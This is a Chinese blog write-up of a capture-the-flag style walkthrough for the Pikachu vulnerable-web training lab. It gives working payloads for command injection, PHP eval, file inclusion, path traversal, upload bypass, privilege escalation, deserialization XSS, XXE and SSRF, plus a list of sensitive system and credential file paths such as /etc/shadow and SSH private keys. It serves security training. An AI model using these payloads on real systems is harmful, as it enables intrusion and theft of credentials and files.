谜团靶机writeup - Pikachu靶场通关指南-下

最新推荐文章于 2024-08-23 13:52:35 发布
最新推荐文章于 2024-08-23 13:52:35 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: 靶机练习 文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zycdn/article/details/122679564
版权

RCE(远程命令/代码执行)

ping

localhost | cat /etc/passwdlocalhost | whoami

eval

phpinfo();或者file_put_contents("mituan.txt","<?php phpinfo();");提交之后,访问http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/rce/mituan.txt即可看到文件,然后可以利用文件包含。

Files Inclusion(文件包含漏洞)

本地文件包含

访问http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/fileinclude/fi_local.php?filename=../../rce/mituan.txt&submit=Submit+Query

远程文件包含

访问http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/fileinclude/fi_remote.php?filename=http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/rce/mituan.txt&submit=Submit+Query

不安全的文件下载

访问http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/unsafedownload/execdownload.php?filename=../../../../../../../etc/passwd

不安全的文件上传

客户端校验

抓包修改文件名、文件内容。之后访问http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/unsafeupload/uploads/client.php
客户端校验

MIME头

方式同上。
MIME

类型验证

生成图片copy 10.jpg/b+c.php pic.jpg上传,访问·ttp://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/unsafeupload/uploads/2022/01/25/20870161ef5bec2fd5a455603730.jpg,然后再文件包含http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/fileinclude/fi_remote.php?filename=http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/unsafeupload/uploads/2022/01/25/20870161ef5bec2fd5a455603730.jpg&submit=Submit+Query

Over Permisson(越权漏洞)

水平越权

使用lucy/123456登录,点击查看个人信息抓包,修改用户名即可查看其他用户资料。
水平越权

垂直越权

使用admin/123456登录,发现可以查看、增加、删除用户,其中查看与删除都是op2_admin.php页面的功能,增加用户是op2_admin_edit.php页面的功能。

使用pikachu/000000登录,然后将浏览器地址直接换成op2_admin.php,发现提示登录。但是将地址换成http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/overpermission/op2/op2_admin_edit.php,确可以进入且能够添加用户。
垂直越权

目录遍历

发现地址栏有参数title=jarheads.php,尝试../进行目录遍历,比如以下文件可以利用http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/dir/dir_list.php?title=../../../index.phphttp://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/dir/dir_list.php?title=../../../vul/dir/soup/truman.phphttp://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/dir/dir_list.php?title=../../../test/phpinfo.txt

敏感信息泄露

打开http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/infoleak/findabc.php,查看源代码发现<!-- 测试账号:lili/123456-->
敏感信息泄露

PHP反序列化漏洞

<?php
	class S{
		var $test = "<img src=# οnlοad=alert(1) οnerrοr=alert(2)>";
		function __destruct(){
			//echo $this->test;
		}
	}

	$s=new S(); //创建一个对象
	echo serialize($s); //把这个对象进行序列化
    
    echo "------------------------------------------";
    $u=unserialize('O:1:"S":1:{s:4:"test";s:44:"<img src=# οnlοad=alert(1) οnerrοr=alert(2)>";}');
    echo $u->test;
    echo "------------------------------------------";
    $u=unserialize('O:1:"S":2:{s:4:"test";s:7:"pikachu";s:4:"test";s:44:"<img src=# οnlοad=alert(1) οnerrοr=alert(2)>";}');
    echo $u->test;
?>

输入O:1:"S":1:{s:4:"test";s:44:"<img src=# onload=alert(1) onerror=alert(2)>";},弹窗。

XXE(XML External Entity attack)

输入以下内容,提交即可。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo[
	<!ELEMENT foo ANY>
	<!ENTITY entity SYSTEM "file:///etc/passwd">
]>
<scan>&entity;</scan>

xxe

不安全的URL重定向

点击http://b0f42ca5b3b14f74a05bed2441d4d847.app.mituan.zone/vul/urlredirect/urlredirect.php?url=http://www.baidu.com,跳转到百度页面。

SSRF(Server-Side Request Forgery)

curl

文件读取:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php
文件读取:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd
内网探测:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_curl.php?url=localhost:3306

file_get_content

PHP伪协议:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-encode/resource=http://127.0.0.1/index.php
文件读取:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_fgc.php?file=file:///etc/passwd
查询IP:http://77ff74a1b3084ae4a6ed25c652f977a2.app.mituan.zone/vul/ssrf/ssrf_fgc.php?file=https://tool.lu/ip

系统敏感文件路径

// Windowsadmin
c:\boot.ini 					// 查看系统版本
c:\windows\system32\inetsrv\MetaBase.xml	// IIS配置文件
c:\windows\repair\sam				// 存储Windows系统初次安装的密码
c:\ProgramFiles\mysql\my.ini	                // MySQL配置
c:\ProgramFiles\mysql\data\mysql\user.MYD       // MySQL root密码
c:\windows\php.ini 	                	// php 配置信息
c:\Windows\win.ini 	                	// Windows系统的一个基本系统配置文件

// Linux
/etc/passwd 			     	                // 账户信息
/etc/shadow 				                // 账户密码文件
/usr/local/app/apache2/conf/httpd.conf 	                // Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf	// 虚拟网站配置
/usr/local/app/php5/lib/php.ini 	     	        // PHP相关配置
/etc/httpd/conf/httpd.conf 				// Apache配置文件
/etc/my.conf 						// mysql 配置文件
/proc/mounts						// 记录系统挂载设备
/porc/config.gz					        // 内核配置文件
/var/lib/mlocate/mlocate.db			        // 全文件路径
/porc/self/cmdline					// 当前进程的cmdline参数
/root/.ssh/known_hosts					// 记录每个访问计算机用户的公钥
/root/.bash_history					// 用户历史命令记录文件
/root/.mysql_history				        // mysql历史命令记录文件
/root/.ssh/authorized_keys			        // 公钥相关
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
zycdn
关注
专栏目录
pikachu通关全集
qq_57449919的博客
03-04 4779
pikachu靶场,点到为止,没有详解,可以自己多查查资料了解,有助提升!
SQL注入-Pikachu靶场通关_pikachu靶场通关sql(1),网络安全应用开发基础大纲
m0_61369275的博客
04-06 865
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
谜团靶机writeup - Pikachu靶场通关指南-上
小龙人
01-24 3337
pikachu靶场
pikachu 靶场通关(全)
最新发布
qq_53058639的博客
08-23 890
网络安全入门到底是先学编程还是先学计算机基础?第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。//union语句聚合两个查询的内容,由于页面只返回一行,所以在前面的输入一个不存在的id,我这里直接使-号,以返回我们输入的内容,这里页面上将1,2都返回了,得知两个字段都有回显,
Pikachu SQL Writeup
qq_43647462的博客
11-12 338
Pikachu SQL Writeup Buchiyexiao 由于个人懒狗外加课程压力较大,所以很多(所有)题目都是只是找到注入点得到一些基础的信息而不进行对数据库信息的进一步挖掘,SQL-Inject模块题目相对较为简单,基本上不太需要工具就可以手工完成注入 数字型注入POST 题干清晰,Hackbar返回数据,两个post型变量,一个id一个submit,注入点明显在id,数字型,直接测or,or 1=1 #直接回显信息 字符型注入GET 原理同上,bcyx’ or 1=1 #得信息 搜索型注入 乍
pikachu靶场通关指南
weixin_43110519的博客
10-06 2290
pikachu靶场记录
pikachu通关(详细教学)
lizhiwei21的博客
11-16 639
暴力破解攻击&暴力破解漏洞概述对暴力破解的理解:暴力破解=连续性的尝试+字典+自动化。其实就是去猜可能的密码,经过不断的试账号和密码,找出正确的账号密码,达到暴力破解的目的。最重要的部分就是,一个好的字典可以大大加快破解速度。常用的账号密码(弱口令),比较常用的账号密码,系统初始设定的账号密码,比如常用用户名/密码TOP 500等。互联网上被脱裤后账号密码(社工库) ,差不多就是撞库,也就是拿已知的一个库去尝试登录另外一个库。比如CSDN当年泄漏的约600w用户信息。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1006
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CISP-PTE靶场(win+centos).zip
03-13
这个靶场让学员有机会学习Linux环境下的安全实践,包括权限管理、日志分析、防火墙配置以及Linux系统的安全审计。 4. **靶场搭建方法**: CISP-PTE靶场搭建方法.rar文件提供了详细的步骤指导,帮助用户在本地或...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
AI-Web-1.0靶场
qq_46187131的博客
03-27 1401
1.确认靶机IP 2.端口和目录扫描 3.使用SQLmap进行注入获取shell 4.使用openssl提权。
pikachu靶场通关详解
ekmgrwaetaetawt的博客
08-08 104
pikachu靶场通关详解——time盲注
pikachu靶场(xss通关教程)
记录学习
05-11 1863
pikachu靶场通关之xss
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值